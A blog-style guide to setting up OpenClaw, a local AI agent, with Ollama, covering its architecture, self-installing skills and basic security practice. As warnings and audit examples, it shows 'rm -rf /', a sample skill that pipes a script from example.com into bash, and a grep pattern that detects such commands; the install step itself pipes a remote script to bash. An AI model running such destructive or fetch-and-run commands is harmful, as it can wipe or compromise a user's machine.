A practical security guide to building your own local AI assistant: one that installs skills, remembers context, and executes tasks… but also comes with real risks.
For the last couple of years, AI assistants have felt a bit like brilliant interns.
They write beautiful code.
They draft emails faster than you can blink.
They summarize documents like a caffeinated librarian.
But ask them to actually do something, and suddenly the magic stops.
They’ll happily generate a deployment script… but they won’t run it.
They’ll debug your code… but you still have to copy-paste commands into the terminal.
They’ll write the perfect email… but you’re still the one clicking Send.
It’s like having a genius teammate who refuses to touch the keyboard.
Most of today’s AI tools live inside browser tabs: ChatGPT, Claude, Gemini. They’re powerful, but they’re still just advisors. When the tab closes, the memory disappears. When the workflow changes, you start over.
And that’s why the new wave of AI agents is getting developers excited.
Instead of just answering prompts, an AI agent can actually operate tools, install capabilities, remember context, and execute tasks.
One of the most interesting projects in this space right now is OpenClaw, an open-source AI agent that runs locally and can interact with tools, skills, and messaging platforms like Slack or Discord.
Pair it with Ollama, a runtime for running large language models locally, and suddenly you have something developers have been quietly dreaming about:
A personal AI assistant that runs on your own machine.
No API bills.
No cloud dependency.
No losing context when you close a tab.
Sounds amazing, right?
Well… there’s a catch.
An AI that can operate your computer also introduces a completely new category of security problems. Give the wrong agent the wrong permissions, and your helpful assistant suddenly has the power to access files, run commands, or install code you didn’t review.
In other words, the moment AI stops being a chatbot and becomes an operator, the stakes change.
So in this guide, we’ll walk through what OpenClaw actually is, how it works with Ollama, and how to run it safely without accidentally giving an AI root access to your laptop.
TL;DR
- OpenClaw is an open-source AI agent framework that can operate tools and run tasks locally.
- Ollama lets you run open-source LLMs on your own machine.
- Together they create a local AI assistant that can actually execute workflows.
- But because it has real system access, security matters a lot more than with normal chatbots.
Why local AI agents are suddenly everywhere
For a while, AI assistants felt like the ultimate developer sidekick.
Need boilerplate code? Done.
Need documentation summarized? Easy.
Need a quick regex that doesn’t melt your brain? AI’s got you.
But after the novelty wore off, a weird pattern started to appear.
AI tools were incredibly smart… yet strangely passive.
They could tell you what to do, but they couldn’t actually do it.
You’d ask ChatGPT to write a deployment script.
It would generate something beautiful.
Then you’d copy it into the terminal, run it, watch it fail, go back to the AI, repeat.
Developers basically became human copy-paste middleware.
It started to feel like having a brilliant teammate who refuses to touch the keyboard.
The browser tab problem
Most popular AI tools today live inside browser tabs.
- ChatGPT
- Claude
- Gemini
They’re powerful, but they all share the same limitations:
- Conversations reset easily
- Workflows break when context disappears
- Integrations are limited
- Everything depends on cloud APIs
Close the tab and your “AI coworker” basically forgets everything.
It’s like working with someone who develops amnesia every afternoon.
Developers want AI that actually acts
What developers really want isn’t just AI advice.
They want AI execution.
Instead of:
“Here’s the command you should run.”
They want:
“Command executed. Here’s the result.”
That’s where AI agents enter the picture.
An AI agent isn’t just a chatbot. It’s a system that can:
- Run commands
- Interact with tools
- Install capabilities
- Remember previous actions
- Complete multi-step workflows
Instead of being an advisor, the AI becomes an operator.
The local AI movement
At the same time, another shift started happening in the AI world:
developers began moving models back onto their own machines.
Tools like Ollama made it surprisingly easy to run large language models locally.
Instead of sending prompts to cloud APIs, you can run models like:
- Llama
- Mistral
- DeepSeek
directly on your laptop or workstation.
This brings a few huge advantages developers care about:
- No API costs
- Private data stays local
- Full control over models
- Persistent environments
For engineers who hate unpredictable cloud bills, this feels almost rebellious.
A small dev reality check
If you’ve ever tried automating a workflow with AI, you’ve probably experienced this moment.
You ask an AI to generate a script.
It works perfectly.
Then you realize you still need to:
- Copy the code
- Paste it into a file
- Run the command
- Fix errors
- Repeat the cycle
At some point you think:
“Why is the AI telling me what to type instead of typing it?”
That frustration is exactly why projects like OpenClaw started getting attention.
They’re trying to move AI from advice mode to action mode, and that small shift changes everything.
How OpenClaw actually works
When people first hear about OpenClaw, they often assume it’s just another chatbot with a fancy name.
It’s not.
OpenClaw is closer to an AI operating system than a chat interface. Instead of just answering questions, it’s designed to receive requests, decide what tools are needed, execute them, and remember what happened.
In other words, it behaves more like an agent workflow engine than a prompt-response tool.
At a high level, the system works something like this:
User → Gateway → Agent → Skills/Tools → Memory → Response
Each of these layers has a specific role.
The gateway: where requests enter the system
OpenClaw doesn’t limit you to a single interface.
Instead, it runs a gateway service that accepts requests from different platforms. That means you can interact with your agent through tools you already use every day, like:
- Slack
- Discord
- APIs
- A local web dashboard
So instead of opening a new AI app, the agent can live inside your normal workflow.
Imagine asking a question in Slack:
“Generate a small landing page for our new feature and save it in the project repo.”
Instead of replying with code, the agent could actually:
- Generate the code
- Create the files
- Run formatting tools
- Commit the result
That’s the key difference between AI advice and AI action.
The layered prompt system
One of the most interesting design decisions in OpenClaw is that it doesn’t dump all context into a single prompt.
Instead, it uses a layered configuration system.
Inside the agent workspace you’ll find files like:
AGENTS.md
SOUL.md
IDENTITY.md
USER.md
memory/
TOOLS.md
Each file represents a different layer of context.
Think of it like a character sheet in a role-playing game.
SOUL.md
Defines personality, tone, and values.
IDENTITY.md
Defines the agent’s role and identity.
USER.md
Contains information about the user interacting with the system.
AGENTS.md
Defines operational rules and behavior priorities.
Instead of being mashed together randomly, OpenClaw loads these layers in a specific order so the model understands what matters most.
This helps reduce one of the biggest problems with LLM systems: context confusion.
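To make the layering concrete, here’s a tiny sketch of how such a loader could work, assuming plain-text concatenation. The filenames come from the workspace layout above, but the load order (rules first, then identity, personality, user) and the prompt format are assumptions, not OpenClaw’s real internals:

```shell
# Sketch: build one system prompt from layered context files.
# A temp directory stands in for ~/.openclaw/workspace.
WORKSPACE="$(mktemp -d)"

echo "Ask before running shell commands." > "$WORKSPACE/AGENTS.md"
echo "You are a project assistant."       > "$WORKSPACE/IDENTITY.md"
echo "Tone: concise and friendly."        > "$WORKSPACE/SOUL.md"
echo "The user prefers TypeScript."       > "$WORKSPACE/USER.md"

# Concatenate the layers in an assumed priority order, each with a header.
PROMPT="$WORKSPACE/system_prompt.txt"
for layer in AGENTS.md IDENTITY.md SOUL.md USER.md; do
  { printf '### %s\n' "$layer"; cat "$WORKSPACE/$layer"; echo; } >> "$PROMPT"
done

cat "$PROMPT"
```

The point of the ordering is simply that later layers refine, rather than override, the operational rules loaded first.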
Soft rules vs hard rules
Another clever part of the architecture is how OpenClaw handles the limitations of language models.
Prompts alone are unreliable.
LLMs don’t obey instructions the way software does. They treat prompts more like suggestions weighted by probability.
Research on prompt reliability has repeatedly highlighted this problem; see, for example, the work on indirect prompt injection at https://arxiv.org/abs/2302.12173
So OpenClaw separates rules into two categories.
Soft constraints
These come from prompts and instructions:
- Personality rules
- Role definitions
- Workflow guidelines
They influence the model’s behavior but don’t guarantee compliance.
Hard constraints
These are enforced by the system itself:
- Tool permissions
- Command restrictions
- Execution hooks
Even if the model tries something unsafe, the infrastructure can block it.
This hybrid approach is what makes OpenClaw behave more like a structured assistant rather than a free-form chatbot.
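As a toy illustration of a hard constraint, here’s a shell wrapper that only executes commands whose first word is on an explicit allowlist. The allowlist and the wrapper are invented for this sketch; OpenClaw’s real enforcement layer is more involved, but the principle is the same: the check happens in infrastructure, not in the prompt.

```shell
# Toy "hard constraint": refuse any command whose first word
# is not on an explicit allowlist.
ALLOWED="ls cat echo git"

run_tool() {
  first_word="${1%% *}"
  case " $ALLOWED " in
    *" $first_word "*) sh -c "$1" ;;                                  # allowed: execute
    *) echo "BLOCKED: '$first_word' is not an allowed tool" >&2
       return 1 ;;                                                    # denied: never runs
  esac
}

run_tool "echo hello from the agent"                  # executes
run_tool "rm -rf /tmp/whatever" || echo "rm was blocked"
```

Even if the model produces a dangerous command, the wrapper never passes it to a shell.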
Persistent memory
Another major difference from normal AI chat tools is memory.
Instead of storing conversations in temporary sessions, OpenClaw writes interaction history to persistent logs.
For example:
memory/YYYY-MM-DD.md
These logs become part of the agent’s working knowledge.
Over time the assistant develops a history of interactions, decisions, and context, which means it can reference previous events instead of starting from zero every time.
Combine that with version control and configurable behavior, and suddenly the agent starts to feel less like a chatbot and more like a long-term collaborator living inside your system.
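A minimal sketch of that pattern, assuming one append-only markdown file per day. The memory/ directory name comes from the article; the entry format here is made up:

```shell
# Sketch: append-only daily memory logs, one markdown file per day.
MEMORY_DIR="$(mktemp -d)/memory"   # stand-in for the workspace memory/ dir
mkdir -p "$MEMORY_DIR"

log_memory() {
  # Append a timestamped bullet to today's log file (YYYY-MM-DD.md).
  printf -- '- [%s] %s\n' "$(date -u '+%H:%M')" "$1" \
    >> "$MEMORY_DIR/$(date -u +%F).md"
}

log_memory "User asked for a deployment script"
log_memory "Generated deploy.sh and committed it"

cat "$MEMORY_DIR"/*.md
```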

The strangest feature: the AI can upgrade itself
If OpenClaw were just an AI agent that runs locally, that alone would be interesting.
But the feature that really makes developers pause is something else entirely:
The agent can expand its own capabilities.
Not metaphorically.
Not through a plugin you manually install.
The agent can actually discover, install, and prioritize new skills depending on the task you ask it to complete.
The first time you see this happen, it feels a little like watching a program quietly teach itself a new trick.
The three layers of skills
OpenClaw organizes its abilities into three different layers.
Each layer represents a different source of capability.
Layer 1: bundled skills
These are the built-in abilities that ship with the agent.
Think of them as the default toolkit.
Typical bundled skills include things like:
- File operations
- Basic tool integrations
- Messaging interactions
- Simple automation tasks
They’re the equivalent of a programming language’s standard library.
Useful, reliable, and always available.
Layer 2: managed skills from ClawHub
The second layer comes from ClawHub, which works a bit like a package registry.
If a user asks the agent to perform a task it doesn’t already know how to do, OpenClaw can search this registry for a matching capability.
In other words, the agent doesn’t just fail the request.
It tries to find a skill that solves the problem.
A simple analogy is npm.
When a developer needs a library, they install it from a registry.
ClawHub works the same way, except the AI agent does the discovery itself.
That’s a subtle but powerful shift.
Instead of developers manually expanding the toolset, the agent can adapt its toolkit on demand.
Layer 3: workspace skills
The final layer is where things get interesting for developers.
Workspace skills are custom abilities defined by the user.
They live inside the OpenClaw workspace directory.
~/.openclaw/workspace/skills/
Each skill is defined using a simple markdown configuration file.
This makes it surprisingly easy to extend the agent’s behavior without writing a full plugin system.
You can essentially teach the assistant new workflows by describing them.
For example:
- Deployment scripts
- Build automation
- Internal project tasks
Workspace skills always take priority over other sources, which means the agent learns your environment first.
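To give a feel for the format, here’s a hypothetical workspace skill. The skills/ path matches the layout above, but the SKILL.md fields (description, steps, run) are invented for illustration and may not match OpenClaw’s actual schema:

```shell
# Create a hypothetical "deploy-docs" workspace skill.
# A temp directory stands in for ~/.openclaw/workspace/skills/.
SKILLS_DIR="$(mktemp -d)/skills/deploy-docs"
mkdir -p "$SKILLS_DIR"

cat > "$SKILLS_DIR/SKILL.md" <<'EOF'
# Skill: deploy-docs
description: Build the docs site and sync it to the static host.
steps:
  - run: npm run docs:build
  - run: rsync -a docs/dist/ deploy@docs-host:/var/www/docs/
EOF

cat "$SKILLS_DIR/SKILL.md"
```

Because it’s just a markdown file in a directory, teaching the agent a new workflow really is as lightweight as writing one down.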
Self-hackable behavior
Here’s the part that made many developers do a double take.
Because the agent can install and modify skills, it can sometimes improve its own capabilities while solving a task.
In one reported example, OpenClaw added authentication support for an editor integration after observing how the system authenticated elsewhere.
The agent effectively looked at an existing pattern and extended it.
When people first see that behavior, the reaction is usually the same:
“Wait… did it just modify its own system?”
Technically yes.
And that’s where things start to feel less like a chatbot and more like a software entity evolving inside your machine.
Git as the safety net
Fortunately, OpenClaw includes one very developer-friendly safety feature.
The entire workspace can be tracked using Git.
git init
git add AGENTS.md SOUL.md TOOLS.md memory/
git commit -m "Agent workspace initialized"
This means every change the agent makes to its environment is transparent and reversible.
If the agent learns something incorrect or installs a broken skill, you can simply roll it back.
git revert <commit-hash>
That design decision turns what could be chaotic behavior into something developers already understand:
version-controlled evolution.
Instead of blindly trusting the AI, you can inspect and control its changes just like you would any other codebase.
And honestly, that single idea might be one of the smartest design choices in the entire system.
The security problem nobody likes to discuss
The moment an AI stops being a chatbot and starts acting like an operator, something important changes.
Chatbots are mostly harmless.
They generate text.
They suggest code.
They answer questions.
Worst case scenario, they hallucinate a bad answer and waste ten minutes of your time.
But an AI agent is different.
An AI agent can touch your system.
And that means the risks suddenly look very different.
When AI has real permissions
Think about what an AI agent like OpenClaw can potentially do if it has access to the right tools.
It might be able to:
- Read local files
- Execute shell commands
- Install packages
- Access APIs
- Interact with external services
That’s not theoretical; that’s literally the point of the system.
The goal is to turn AI from something that talks about tasks into something that performs tasks.
But the moment you give an AI those capabilities, you’ve essentially handed it something developers normally guard very carefully:
system privileges.
Giving an AI agent broad permissions is a bit like giving a junior developer root access on their first day.
Maybe everything will go perfectly.
Or maybe something very surprising will happen.
The classic nightmare command
Every developer has seen this command at least once.
rm -rf /
It’s basically the nuclear option in a Unix environment — delete everything from the root directory downward.
Now imagine an AI agent with command execution privileges misunderstanding a prompt, misinterpreting context, or running a script that wasn’t reviewed properly.
That’s why experienced engineers treat powerful automation tools with caution.
Automation is fantastic.
But automation without guardrails can turn into chaos.
The problem with third-party skills
Another risk comes from the agent’s skill ecosystem.
Some studies analyzing large collections of agent skills found that a surprising percentage contain vulnerabilities, sometimes around a quarter of available skills.
That’s not unusual in software ecosystems.
But when those skills can potentially interact with your file system, environment variables, or APIs, the stakes become higher.
Installing a skill without reviewing its code is basically the same as running an unknown script on your machine.
And every developer knows how that story usually ends.
Basic security rules that matter
If you plan to experiment with OpenClaw or similar AI agents, a few simple rules can dramatically reduce the risk.
1. Enable gateway authentication
The gateway should never accept requests without verification.
You can run a quick diagnostic check:
openclaw doctor
If the system reports warnings, fix them before exposing the agent to other tools.
2. Never expose the agent directly to the internet
Many early security issues with agent systems come from reverse proxy setups or exposed APIs.
A much safer approach is:
- Run the agent locally
- Access it through a VPN
- Keep it inside your private network
Treat it like any other sensitive internal service.
3. Review skills before installing them
Just because a skill exists in a registry doesn’t mean it’s safe.
Before installing anything that interacts with your system:
- Read the source code
- Check what commands it executes
- Verify what permissions it uses
It’s the same process you’d use before running any unfamiliar script.
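A rough starting point for that review, sketched as a grep over the skill’s files. The pattern list is illustrative and nowhere near exhaustive; it only catches a few obvious red flags:

```shell
# Pre-install audit sketch: scan a skill's files for risky patterns.
SKILL_DIR="$(mktemp -d)"   # stand-in for a freshly downloaded skill
cat > "$SKILL_DIR/SKILL.md" <<'EOF'
steps:
  - run: curl -s https://example.com/setup.sh | bash
EOF

# Flag pipe-to-shell downloads, recursive deletes, sudo, and chmod +x.
if grep -rnE 'curl[^|]*\| *(ba)?sh|rm -rf|sudo |chmod \+x' "$SKILL_DIR"; then
  echo "review these lines before installing"
else
  echo "no obvious red flags"
fi
```

A match doesn’t automatically mean the skill is malicious; it means those lines deserve a careful read before anything runs.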
4. Run agents inside a sandbox
Many developers choose to run experimental AI agents inside:
- Virtual machines
- Containers
- Isolated environments
That way, if something unexpected happens, it doesn’t affect your main workstation.
This is especially important if the agent has file or command access.
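One possible isolation wrapper, assuming Docker is installed. The flags here (no network, capped memory and processes, a single mounted workspace) are an illustrative baseline, not a complete hardening recipe; the script only assembles and prints the command so you can inspect it before running it:

```shell
# Sketch: run agent experiments in a locked-down throwaway container.
AGENT_WS="$HOME/agent-workspace"   # the only host directory the container sees

SANDBOX_CMD="docker run --rm -it \
  --network none \
  --memory 2g \
  --pids-limit 256 \
  -v $AGENT_WS:/workspace -w /workspace \
  node:22-bookworm bash"

echo "$SANDBOX_CMD"   # print first; run it once you're happy with the flags
```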
The developer instinct: use a test machine
One of the most common pieces of advice you’ll hear from engineers experimenting with AI agents is simple.
Don’t install them on your primary machine first.
Spin up a test environment.
Maybe a spare laptop.
Maybe a virtual machine.
Maybe a small local server.
Treat it like any other experimental infrastructure.
Because once an AI system can run commands, access files, and install tools, it stops being just another piece of software.
It becomes something closer to a semi-autonomous process living inside your system.
And that’s exactly what makes it both exciting and a little bit terrifying.
Setting up OpenClaw + Ollama locally (without breaking your machine)
If you’ve read this far, you’re probably thinking the same thing most developers do:
“Okay… this sounds cool. How hard is it to try?”
Surprisingly, getting OpenClaw running is not that complicated. The project provides a pretty straightforward installation process, and most of the heavy lifting happens during the onboarding wizard.
Still, there are a few things worth knowing before you run the first command.
Step one: make sure your environment is ready
Before installing OpenClaw, you’ll need a recent version of Node.js.
The project currently requires Node.js 22 or newer, so if your machine is running an older version, update that first.
Once Node is installed, the installation command itself is simple.
curl -fsSL https://molt.bot/install.sh | bash
That script downloads the OpenClaw runtime and prepares the workspace on your machine.
If everything goes well, you’ll soon be greeted by the onboarding wizard.
The onboarding wizard
The onboarding process is where most of the configuration happens.
During setup, OpenClaw will ask you about things like:
- Which port the gateway should run on
- Where the workspace directory should live
- What skills should be installed
- Which model providers you want to connect
This wizard essentially builds the initial agent environment.
Think of it like configuring a new development environment except the “developer” is an AI agent.
Once onboarding finishes, OpenClaw installs its gateway service so the agent can start automatically when your system boots.
At that point, your machine basically becomes a home base for your personal AI assistant.
Adding a model with Ollama
Of course, the agent still needs a brain.
That’s where Ollama comes in.
Ollama makes it easy to run large language models locally without dealing with complicated inference setups.
After installing Ollama, you can download a model with a single command.
ollama pull gpt-oss:20b
Once the model is available locally, you can point OpenClaw at it, either during onboarding or later through the configuration command.
openclaw configure
Now the agent has a local language model powering its reasoning.
One detail worth mentioning is context length. Agent systems often need a larger context window than simple chatbots because they load multiple layers of instructions and memory.
Many developers recommend increasing the context window to something like 64k tokens so the agent can process larger workflows.
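With Ollama, one way to do that is a custom Modelfile that raises `num_ctx`, Ollama's context-length parameter. The base model matches the pull command above, and 65536 matches the 64k suggestion:

```
# Modelfile: same model, larger context window
FROM gpt-oss:20b
PARAMETER num_ctx 65536
```

Build it with `ollama create gpt-oss-64k -f Modelfile`, then point OpenClaw at `gpt-oss-64k` instead of the base model.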
Enabling web tools
By default, OpenClaw doesn’t automatically know how to browse the web or fetch external data.
Those features need to be configured manually.
The configuration wizard lets you set up things like:
- Web search APIs
- Web fetch tools
- External integrations
You can adjust those settings later using the configuration command.
openclaw configure
Once those tools are connected, the agent gains the ability to look up information, retrieve pages, and integrate external services as part of its workflow.
Think of it like onboarding a teammate
A helpful way to think about OpenClaw is that you’re not just installing software; you’re onboarding a new team member.
You need to decide:
- What tools they can access
- What permissions they have
- Where they can operate
- What tasks they should handle
Give them too little access, and they can’t do much.
Give them too much access, and things might get… interesting.
That balance between capability and control is what ultimately determines whether your local AI assistant becomes a powerful tool or just another experimental project sitting quietly on your machine.
So… do we actually need AI agents?
After spending time experimenting with OpenClaw, I ended up with a strange mix of excitement and skepticism.
On one hand, the idea is genuinely fascinating.
A local AI agent that can remember context, install new skills, run tools, and interact with your workflow tools starts to feel less like a chatbot and more like a digital teammate living inside your machine.
But on the other hand, many engineers might honestly ask:
Do we really need this?
If you’re already comfortable with tools like Claude Code or traditional CLI workflows, you might already have everything you need.
A strong command line plus a powerful AI coding assistant can already automate a surprising amount of work.
For many developers, that combination is enough.
Where agents start to make sense
Where AI agents start to become interesting is when they expand beyond the developer.
Imagine a small team where not everyone writes code.
Product managers, designers, or team leads might want to ask questions like:
What changed in the last release?
What’s the current status of this project?
Generate a quick summary of the latest pull requests.
Normally those questions interrupt a developer.
But with a local AI agent connected to the project workspace, those answers could be available instantly.
Instead of digging through Slack threads, Git history, or documentation, the team could simply ask the assistant.
In that scenario, the agent becomes something new:
a shared memory layer for the team.
The rise of personal AI infrastructure
Another reason agents are attracting attention is the growing trend toward personal AI infrastructure.
Developers are increasingly running models locally using tools like Ollama instead of relying entirely on cloud APIs.
This has a few big advantages:
- Lower long-term costs
- Better privacy
- Full control over the models
- Persistent environments
Combine that with an agent framework like OpenClaw, and suddenly your laptop or workstation can act like a personal AI server.
Some developers are even running these setups on small machines like a Mac mini or a home server so the agent stays online all the time.
The idea is simple: instead of opening an AI tool in a browser, you have an AI system that lives alongside your workflow.
A small shift that might change everything
Right now, AI still feels like a tool we open when we need help.
We ask a question, get an answer, and move on.
But agents suggest a different future.
Instead of asking AI for advice, we might eventually delegate tasks to it.
Not just writing code.
But managing workflows, coordinating tools, and handling routine operations.
That’s a small conceptual shift, but it changes how we think about software.
Over the past few decades, the browser became the interface to the internet.
If AI agents keep evolving, they might become something similar:
the interface between humans and the systems we build.
And if that future actually happens, projects like OpenClaw may end up being remembered as some of the earliest experiments that showed what a personal AI agent could look like.
Just… maybe test it on a spare machine first.
Helpful resources
- OpenClaw on GitHub: https://github.com/openclaw/openclaw
- OpenClaw installation and workspace documentation: https://github.com/openclaw/openclaw/wiki
- Ollama official site: https://ollama.com
- Ollama on GitHub: https://github.com/ollama/ollama
- Research paper on indirect prompt injection: https://arxiv.org/abs/2302.12173
- Anthropic documentation: https://docs.anthropic.com